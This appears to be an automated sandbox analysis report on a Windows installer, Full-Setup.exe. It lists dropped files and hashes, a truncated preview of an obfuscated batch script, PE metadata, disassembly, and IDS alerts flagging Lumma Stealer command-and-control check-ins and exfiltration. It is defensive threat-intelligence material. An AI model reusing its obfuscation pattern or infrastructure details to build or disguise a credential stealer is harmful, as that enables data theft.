                                                                                                                                                                        SHA-512:48DC0B76AFC57D20BC05C282C96FC9608E3AC3755851E358BF55FDAB60C4D51363DFA5D80803517FC0ACD0343718F404E3B8C526450C4BD7105413C527C438DC
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:Set Mph=a..ecIQAssist-Para-..HlDPassport-Labels-..TLQCassette-Privileges-Bbw-Solving-Except-Bosnia-..PprmPublishing-Terror-Semi-Documentary-Lists-Maximum-Deutschland-Arrangements-..LBOWal-Risks-Fortune-Headers-Booty-Indiana-Hard-Employers-..ClYFi-Pty-Framing-Different-Intervals-Dishes-..xSStaying-Dad-Zdnet-..nNHi-..fwFf-Happens-Graduates-Ave-..Set Assured=v..NhYCashiers-Rings-Undergraduate-..ZlExtensions-Ata-Music-Understand-Clearing-..IxWPharmacology-Newer-Tv-Martha-Cards-Thirty-Unlike-..WWFnLatin-Spreading-Steal-Toll-Vessel-Cuts-Gets-George-Albert-..DcUxSecurities-Movement-Indeed-Officers-Dem-Street-Boxing-People-..NqYou-For-Antigua-Drill-Tend-Stops-Charlie-Beauty-..Set Sie=M..hlQuiz-Ties-Participated-Juan-System-Egypt-Irs-Register-..vPDiscounts-Ins-Dude-Opportunities-Pork-Coupons-Finding-Commission-Dream-..rPdStations-Residential-Equations-Robinson-From-Biodiversity-Estimation-..XZPossibility-Approval-Headers-Mixture-Fell-..aOCWEarrings-Investigate-Pdf-Simpsons-Tools-Ages-New-Badly-
                                                                                                                                                                        Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                        File Type:ASCII text, with very long lines (609), with CRLF line terminators
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):13827
                                                                                                                                                                        Entropy (8bit):5.117855141294102
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:384:ULaJc1avY8sSRm9S/1NFJu9+4gnTkErJv1SmHsuXXhB:ULaJc1j89RYGFJu9F0pJv1S6zHn
                                                                                                                                                                        MD5:78B0DAEC569C0BA30DC288E6A88A2988
                                                                                                                                                                        SHA1:D536E6666978BAF85345C37DBB349A1FFF25156E
                                                                                                                                                                        SHA-256:812E8DF7B39D7F25FF253082C4375CC1B48F94AAF1AD6825C68772F283FF89F9
                                                                                                                                                                        SHA-512:48DC0B76AFC57D20BC05C282C96FC9608E3AC3755851E358BF55FDAB60C4D51363DFA5D80803517FC0ACD0343718F404E3B8C526450C4BD7105413C527C438DC
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:Set Mph=a..ecIQAssist-Para-..HlDPassport-Labels-..TLQCassette-Privileges-Bbw-Solving-Except-Bosnia-..PprmPublishing-Terror-Semi-Documentary-Lists-Maximum-Deutschland-Arrangements-..LBOWal-Risks-Fortune-Headers-Booty-Indiana-Hard-Employers-..ClYFi-Pty-Framing-Different-Intervals-Dishes-..xSStaying-Dad-Zdnet-..nNHi-..fwFf-Happens-Graduates-Ave-..Set Assured=v..NhYCashiers-Rings-Undergraduate-..ZlExtensions-Ata-Music-Understand-Clearing-..IxWPharmacology-Newer-Tv-Martha-Cards-Thirty-Unlike-..WWFnLatin-Spreading-Steal-Toll-Vessel-Cuts-Gets-George-Albert-..DcUxSecurities-Movement-Indeed-Officers-Dem-Street-Boxing-People-..NqYou-For-Antigua-Drill-Tend-Stops-Charlie-Beauty-..Set Sie=M..hlQuiz-Ties-Participated-Juan-System-Egypt-Irs-Register-..vPDiscounts-Ins-Dude-Opportunities-Pork-Coupons-Finding-Commission-Dream-..rPdStations-Residential-Equations-Robinson-From-Biodiversity-Estimation-..XZPossibility-Approval-Headers-Mixture-Fell-..aOCWEarrings-Investigate-Pdf-Simpsons-Tools-Ages-New-Badly-
                                                                                                                                                                        Process:C:\Users\user\Desktop\Full-Setup.exe
                                                                                                                                                                        File Type:data
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):71680
                                                                                                                                                                        Entropy (8bit):6.258235350072752
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:1536:gbLmbZzW9FfTubb1/Dde6YF640L6wy4Za9IN3YRYfv2j62SfuVGHj1vtK7h6RM:gbLezW9FfTut/Dde6u640ewy4Za9coR9
                                                                                                                                                                        MD5:C38E98A01F47F09C5524D9C3EBC605C3
                                                                                                                                                                        SHA1:A06B099F49EA4486C84E036A0EDD3F3999914A09
                                                                                                                                                                        SHA-256:B9ED1A0EB8A71FF3C88578AB137D2BC74A420AC4CBF0A517278718648BBC18AC
                                                                                                                                                                        SHA-512:8050FB3F27D8D0A995D8CC441193BDBD6CDCA2518721001B7EA3EA8B1690AFEC03ECDA09FEB97DC526F662642C9A30AAB4EE3F72533C0D12B0EEF2CD99AC4929
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:[..]...U.......V..M.h..I...`...u..........u....H..|1...D1.t..@8.@......|1...D1.t..@8.@...a.L$..6..........D$.P..8....u....H..|1...D1.t..@8.@......|1...D1.t..@8.@.....M..D$.P.n...L$......3.^..]...U..V.u....m.....u..u.........&..F.............j..0.. .I.3.^]...U......DSV.u.W..V.|$ .!.....u>.u.......3.3.B...V....H..D9.8\9.t..@8.P..D9.8\9.t..@8.X..X....L$0.0....F..p....p....N....D$ .A..D$$.A..D$(.A..L$ .D$,...P....t$$.t$$....I.h..I..L$D.....u....D$@..P.Zl...~..r.....h .L..|$...?..Y.L$$3.;.uU..t..T$ . .L.+...4...8f;..t$..u..|$..|$.u.......u...u.SSh.....P....D$.f9D$......@..h@.L..>..Y.L$$;.uU..t..T$ .@.L.+...<...0f;..|$..|$..t$..u.u.......u...u.............D$.f9D$......@..h`.L..A>..Y.L$$;.uq..t..T$ .`.L.+...<...0f;..|$..|$..t$..u.u6......u...u9.F..L$0Q.H..p....P.....P...........D$.f9D$......@..hp.L..=..Y.L$$;.uZ..t/.T$ .p.L.+.T$...8.....|$.f;.|$.u&.T$.......u....u!SSh2....7..H.I.....f;T$......@....L..L$ .......t&.F..H......j.Ph,....7..H.I........K......L..L$ .....
                                                                                                                                                                        Process:C:\Users\user\Desktop\Full-Setup.exe
                                                                                                                                                                        File Type:data
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):115712
                                                                                                                                                                        Entropy (8bit):6.3010489615002685
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:3072:uZg5PXPeiR6MKkjGWoUlJUPdgQa8Bp/LxyA3laWH:uK5vPeDkjGgQaE/lN
                                                                                                                                                                        MD5:18494B05E15EF847ADA16F0467AD0760
                                                                                                                                                                        SHA1:B50C06ABF5096383FF3D9345D4C6DA1FFE575868
                                                                                                                                                                        SHA-256:807B9561B71FEE9AE0E85FE8CC78CB9CDCA50C7B15072E93FB8124F11DB8ADC1
                                                                                                                                                                        SHA-512:E669C689FA360548F3762F8E7FCA3BDAEE47C4682AA3AAD23C763676D9BECB8A436412CDC8486AEB79C7A4610227285D96F1DBF08EED0E80FAE08A1904045FEE
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:.........................................t.M.....hi'D......Y.hs'D......Y..r...hx'D......Y..|X..h}'D......Y.Q.I...h.'D.....Y.0$M.Q.@..0$M.P.=B..h.'D.....Y...C..h.'D.....Y.....h.'D..}...Y..+O..h.'D..l...Y..!...h.'D..[...Y.45M....h.'D..E...Y.U....SVW.}.....e....E..E..w..E..E.E.E............v..G..H..z....E....v..G..H..g....E....v..O..I..T....E...v..O..I..A....E...v..O..I.......E...v..O..I.......E..O..1...?}...u..N..u..u..u..u..u..u..1........p.....u.........F.....3._..^[....U..V.u.3.W.~....p....N.j.j.P..j.j....Pj......u..........>3._.F.....^]...SV..3.Wj._.N...N(...^..^..~..^..^..^ .^$.4......f.^8.Nl.F:..^<.^@.FL.FP.FT.FX.F\.F`.Fd.....j....................F|U............[............u......3........................l.....p.....t.....x.....|...........................f.............................................................._......^[.U..SV..j.[.F.9F.u0...j.X;.sF3.F...W.......Q......~....Y.......~._S.....Y.M......V..N.....F.^[]......U..QQ.}..........L)M....tv
                                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                        Entropy (8bit):7.962251476679135
                                                                                                                                                                        TrID:
                                                                                                                                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                        File name:Full-Setup.exe
                                                                                                                                                                        File size:1'286'284 bytes
                                                                                                                                                                        MD5:8f260f06588b4b171caa42f66929d9a6
                                                                                                                                                                        SHA1:c3632bec197bf268b7ee2cd7a709691f8a35a61a
                                                                                                                                                                        SHA256:a8d6e59a8f43bdcfad4de075ebc483aeda53c0ebbc59332d84663591adaeaa03
                                                                                                                                                                        SHA512:31790a1e227d5cb2af08d67c4325e0a1df81d1e16d15a1793563d6e7a64a058cdeb8055152a9aa7fccbc4324e42285a0e784b00a95ace280ca2e88e1a5890a17
                                                                                                                                                                        SSDEEP:24576:brzzh68Q0RsYk+6txVVC9U0MPGZAwF1yJgl0Or7OIDwMPEg9dcMWgGx0C2K2:/zz9sYkhHIU0M+ZAwFiwrVwM7Mxp2K2
                                                                                                                                                                        TLSH:D655239B8F7A64A6C0A16F7237B0DB574D775D08AF119A3AA711F1CB72663C20081B37
                                                                                                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................t.......B...8.....
                                                                                                                                                                        Icon Hash:9070f8d8d0e47080
                                                                                                                                                                        Entrypoint:0x4038af
                                                                                                                                                                        Entrypoint Section:.text
                                                                                                                                                                        Digitally signed:true
                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                        Subsystem:windows gui
                                                                                                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                        Time Stamp:0x4F47E2E4 [Fri Feb 24 19:20:04 2012 UTC]
                                                                                                                                                                        TLS Callbacks:
                                                                                                                                                                        CLR (.Net) Version:
                                                                                                                                                                        OS Version Major:5
                                                                                                                                                                        OS Version Minor:0
                                                                                                                                                                        File Version Major:5
                                                                                                                                                                        File Version Minor:0
                                                                                                                                                                        Subsystem Version Major:5
                                                                                                                                                                        Subsystem Version Minor:0
                                                                                                                                                                        Import Hash:be41bf7b8cc010b614bd36bbca606973
                                                                                                                                                                        Signature Valid:false
                                                                                                                                                                        Signature Issuer:CN=VeriSign Class 3 Code Signing 2009-2 CA, OU=Terms of use at https://www.verisign.com/rpa (c)09, OU=VeriSign Trust Network, O="VeriSign, Inc.", C=US
                                                                                                                                                                        Signature Validation Error:The digital signature of the object did not verify
                                                                                                                                                                        Error Number:-2146869232
                                                                                                                                                                        Not Before, Not After
                                                                                                                                                                        • 01/07/2010 20:00:00 02/07/2011 19:59:59
                                                                                                                                                                        Subject Chain
                                                                                                                                                                        • CN=USBlyzer, OU=Digital ID Class 3 - Microsoft Software Validation v2, O=USBlyzer, L=St. Petersburg, S=St. Petersburg, C=RU
                                                                                                                                                                        Version:3
                                                                                                                                                                        Thumbprint MD5:75297C190C025C7A82B15677D333560E
                                                                                                                                                                        Thumbprint SHA-1:86E18A81B94E1011C5D3E1E60789AAACCF36704A
                                                                                                                                                                        Thumbprint SHA-256:1E9B8DE53D2F7273D2C9CBBF7AA2382E1A6C2141774B5C41FFE26E60A0F07CC9
                                                                                                                                                                        Serial:62FCC26A7F4A434259B8883B05A42C28
                                                                                                                                                                        Instruction
                                                                                                                                                                        sub esp, 000002D4h
                                                                                                                                                                        push ebx
                                                                                                                                                                        push ebp
                                                                                                                                                                        push esi
                                                                                                                                                                        push edi
                                                                                                                                                                        push 00000020h
                                                                                                                                                                        xor ebp, ebp
                                                                                                                                                                        pop esi
                                                                                                                                                                        mov dword ptr [esp+18h], ebp
                                                                                                                                                                        mov dword ptr [esp+10h], 0040A268h
                                                                                                                                                                        mov dword ptr [esp+14h], ebp
                                                                                                                                                                        call dword ptr [00409030h]
                                                                                                                                                                        push 00008001h
                                                                                                                                                                        call dword ptr [004090B4h]
                                                                                                                                                                        push ebp
                                                                                                                                                                        call dword ptr [004092C0h]
                                                                                                                                                                        push 00000008h
                                                                                                                                                                        mov dword ptr [0047EB98h], eax
                                                                                                                                                                        call 00007FE8BCED7CEBh
                                                                                                                                                                        push ebp
                                                                                                                                                                        push 000002B4h
                                                                                                                                                                        mov dword ptr [0047EAB0h], eax
                                                                                                                                                                        lea eax, dword ptr [esp+38h]
                                                                                                                                                                        push eax
                                                                                                                                                                        push ebp
                                                                                                                                                                        push 0040A264h
                                                                                                                                                                        call dword ptr [00409184h]
                                                                                                                                                                        push 0040A24Ch
                                                                                                                                                                        push 00476AA0h
                                                                                                                                                                        call 00007FE8BCED79CDh
                                                                                                                                                                        call dword ptr [004090B0h]
                                                                                                                                                                        push eax
                                                                                                                                                                        mov edi, 004CF0A0h
                                                                                                                                                                        push edi
                                                                                                                                                                        call 00007FE8BCED79BBh
                                                                                                                                                                        push ebp
                                                                                                                                                                        call dword ptr [00409134h]
                                                                                                                                                                        cmp word ptr [004CF0A0h], 0022h
                                                                                                                                                                        mov dword ptr [0047EAB8h], eax
                                                                                                                                                                        mov eax, edi
                                                                                                                                                                        jne 00007FE8BCED52BAh
                                                                                                                                                                        push 00000022h
                                                                                                                                                                        pop esi
                                                                                                                                                                        mov eax, 004CF0A2h
                                                                                                                                                                        push esi
                                                                                                                                                                        push eax
                                                                                                                                                                        call 00007FE8BCED7691h
                                                                                                                                                                        push eax
                                                                                                                                                                        call dword ptr [00409260h]
                                                                                                                                                                        mov esi, eax
                                                                                                                                                                        mov dword ptr [esp+1Ch], esi
                                                                                                                                                                        jmp 00007FE8BCED5343h
                                                                                                                                                                        push 00000020h
                                                                                                                                                                        pop ebx
                                                                                                                                                                        cmp ax, bx
                                                                                                                                                                        jne 00007FE8BCED52BAh
                                                                                                                                                                        add esi, 02h
                                                                                                                                                                        cmp word ptr [esi], bx
                                                                                                                                                                        Programming Language:
                                                                                                                                                                        • [ C ] VS2008 SP1 build 30729
                                                                                                                                                                        • [IMP] VS2008 SP1 build 30729
                                                                                                                                                                        • [ C ] VS2010 SP1 build 40219
                                                                                                                                                                        • [RES] VS2010 SP1 build 40219
                                                                                                                                                                        • [LNK] VS2010 SP1 build 40219
                                                                                                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0xac400xb4.rdata
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x1000000x381da.rsrc
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x1386440x1a48
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x860000x994.ndata
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x90000x2d0.rdata
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                        .text0x10000x728c0x7400419d4e1be1ac35a5db9c47f553b27ceaFalse0.6566540948275862data6.499708590628113IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                        .rdata0x90000x2b6e0x2c00cca1ca3fbf99570f6de9b43ce767f368False0.3678977272727273data4.497932535153822IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                        .data0xc0000x72b9c0x20077f0839f8ebea31040e462523e1c770eFalse0.279296875data1.8049406284608531IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                        .ndata0x7f0000x810000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                        .rsrc0x1000000x381da0x38200fb14727ebfec93144506225654520e85False0.9375695991091314data7.759085572070425IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                        .reloc0x1390000xfd60x1000ba3b223c1ed5500e95c7b8ebb85a48e8False0.5947265625data5.580122163212792IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                        RT_ICON0x1002800x2d7cfPNG image data, 512 x 512, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9783328592360414
                                                                                                                                                                        RT_ICON0x12da500x4db6PNG image data, 128 x 128, 8-bit/color RGBA, non-interlacedEnglishUnited States0.998039609932643
                                                                                                                                                                        RT_ICON0x1328080x182aPNG image data, 64 x 64, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0017782088587133
                                                                                                                                                                        RT_ICON0x1340340x2668Device independent bitmap graphic, 48 x 96 x 32, image size 9792EnglishUnited States0.3729658258746949
                                                                                                                                                                        RT_ICON0x13669c0x1128Device independent bitmap graphic, 32 x 64 x 32, image size 4352EnglishUnited States0.427367941712204
                                                                                                                                                                        RT_ICON0x1377c40x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.526595744680851
                                                                                                                                                                        RT_DIALOG0x137c2c0x100dataEnglishUnited States0.5234375
                                                                                                                                                                        RT_DIALOG0x137d2c0x11cdataEnglishUnited States0.6056338028169014
                                                                                                                                                                        RT_DIALOG0x137e480x60dataEnglishUnited States0.7291666666666666
                                                                                                                                                                        RT_GROUP_ICON0x137ea80x5adataEnglishUnited States0.7888888888888889
                                                                                                                                                                        RT_MANIFEST0x137f040x2d6XML 1.0 document, ASCII text, with very long lines (726), with no line terminatorsEnglishUnited States0.5647382920110193
                                                                                                                                                                        DLLImport
                                                                                                                                                                        KERNEL32.dllSetFileTime, CompareFileTime, SearchPathW, GetShortPathNameW, GetFullPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, CreateDirectoryW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, SetErrorMode, lstrcpynA, CloseHandle, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, LoadLibraryW, CreateProcessW, lstrcmpiA, CreateFileW, GetTempFileNameW, lstrcatW, GetProcAddress, LoadLibraryA, GetModuleHandleA, OpenProcess, lstrcpyW, GetVersionExW, GetSystemDirectoryW, GetVersion, lstrcpyA, RemoveDirectoryW, lstrcmpA, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GlobalFree, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, WideCharToMultiByte, lstrlenA, MulDiv, WriteFile, ReadFile, MultiByteToWideChar, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, lstrlenW
                                                                                                                                                                        USER32.dllGetAsyncKeyState, IsDlgButtonChecked, ScreenToClient, GetMessagePos, CallWindowProcW, IsWindowVisible, LoadBitmapW, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, TrackPopupMenu, GetWindowRect, AppendMenuW, CreatePopupMenu, GetSystemMetrics, EndDialog, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, DialogBoxParamW, CheckDlgButton, CreateWindowExW, SystemParametersInfoW, RegisterClassW, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharNextA, CharUpperW, CharPrevW, wvsprintfW, DispatchMessageW, PeekMessageW, wsprintfA, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, CharNextW, GetClassInfoW, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, FindWindowExW
                                                                                                                                                                        GDI32.dllSetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor, SelectObject
                                                                                                                                                                        SHELL32.dllSHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW, SHGetSpecialFolderLocation
                                                                                                                                                                        ADVAPI32.dllRegEnumKeyW, RegOpenKeyExW, RegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumValueW
                                                                                                                                                                        COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                                                                                                                                                        ole32.dllCoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
                                                                                                                                                                        VERSION.dllGetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW
                                                                                                                                                                        Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                        EnglishUnited States
                                                                                                                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                        2024-12-21T13:02:07.212650+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449738104.21.43.127443TCP
                                                                                                                                                                        2024-12-21T13:02:08.245697+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449738104.21.43.127443TCP
                                                                                                                                                                        2024-12-21T13:02:08.245697+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449738104.21.43.127443TCP
                                                                                                                                                                        2024-12-21T13:02:09.519860+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449739104.21.43.127443TCP
                                                                                                                                                                        2024-12-21T13:02:10.293340+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.449739104.21.43.127443TCP
                                                                                                                                                                        2024-12-21T13:02:10.293340+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449739104.21.43.127443TCP
                                                                                                                                                                        2024-12-21T13:02:11.827348+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449740104.21.43.127443TCP
                                                                                                                                                                        2024-12-21T13:02:14.357082+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449741104.21.43.127443TCP
                                                                                                                                                                        2024-12-21T13:02:16.534303+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449743104.21.43.127443TCP
                                                                                                                                                                        2024-12-21T13:02:19.211420+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449750104.21.43.127443TCP
                                                                                                                                                                        2024-12-21T13:02:19.966107+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.449750104.21.43.127443TCP
                                                                                                                                                                        2024-12-21T13:02:21.642694+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449756104.21.43.127443TCP
                                                                                                                                                                        2024-12-21T13:02:25.113484+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449767104.21.43.127443TCP
                                                                                                                                                                        2024-12-21T13:02:25.896219+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449767104.21.43.127443TCP
                                                                                                                                                                        2024-12-21T13:02:27.255557+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449773104.26.3.16443TCP
                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                        Dec 21, 2024 13:02:05.980190992 CET49738443192.168.2.4104.21.43.127
                                                                                                                                                                        Dec 21, 2024 13:02:05.980225086 CET44349738104.21.43.127192.168.2.4
                                                                                                                                                                        Dec 21, 2024 13:02:05.980370998 CET49738443192.168.2.4104.21.43.127
                                                                                                                                                                        Dec 21, 2024 13:02:05.983752966 CET49738443192.168.2.4104.21.43.127
                                                                                                                                                                        Dec 21, 2024 13:02:05.983772039 CET44349738104.21.43.127192.168.2.4
                                                                                                                                                                        Dec 21, 2024 13:02:07.212398052 CET44349738104.21.43.127192.168.2.4
                                                                                                                                                                        Dec 21, 2024 13:02:07.212650061 CET49738443192.168.2.4104.21.43.127
                                                                                                                                                                        Dec 21, 2024 13:02:07.221096039 CET49738443192.168.2.4104.21.43.127
                                                                                                                                                                        Dec 21, 2024 13:02:07.221121073 CET44349738104.21.43.127192.168.2.4
                                                                                                                                                                        Dec 21, 2024 13:02:07.221402884 CET44349738104.21.43.127192.168.2.4
                                                                                                                                                                        Dec 21, 2024 13:02:07.269583941 CET49738443192.168.2.4104.21.43.127
                                                                                                                                                                        Dec 21, 2024 13:02:07.272531986 CET49738443192.168.2.4104.21.43.127
                                                                                                                                                                        Dec 21, 2024 13:02:07.272531986 CET49738443192.168.2.4104.21.43.127
                                                                                                                                                                        Dec 21, 2024 13:02:07.272713900 CET44349738104.21.43.127192.168.2.4
                                                                                                                                                                        Dec 21, 2024 13:02:08.245744944 CET44349738104.21.43.127192.168.2.4
                                                                                                                                                                        Dec 21, 2024 13:02:08.245975971 CET44349738104.21.43.127192.168.2.4
                                                                                                                                                                        Dec 21, 2024 13:02:08.246037960 CET49738443192.168.2.4104.21.43.127
                                                                                                                                                                        Dec 21, 2024 13:02:08.247636080 CET49738443192.168.2.4104.21.43.127
                                                                                                                                                                        Dec 21, 2024 13:02:08.247651100 CET44349738104.21.43.127192.168.2.4
                                                                                                                                                                        Dec 21, 2024 13:02:08.247679949 CET49738443192.168.2.4104.21.43.127
                                                                                                                                                                        Dec 21, 2024 13:02:08.247685909 CET44349738104.21.43.127192.168.2.4
                                                                                                                                                                        Dec 21, 2024 13:02:08.303241014 CET49739443192.168.2.4104.21.43.127
                                                                                                                                                                        Dec 21, 2024 13:02:08.303271055 CET44349739104.21.43.127192.168.2.4
                                                                                                                                                                        Dec 21, 2024 13:02:08.303354979 CET49739443192.168.2.4104.21.43.127
                                                                                                                                                                        Dec 21, 2024 13:02:08.303611040 CET49739443192.168.2.4104.21.43.127
                                                                                                                                                                        Dec 21, 2024 13:02:08.303626060 CET44349739104.21.43.127192.168.2.4
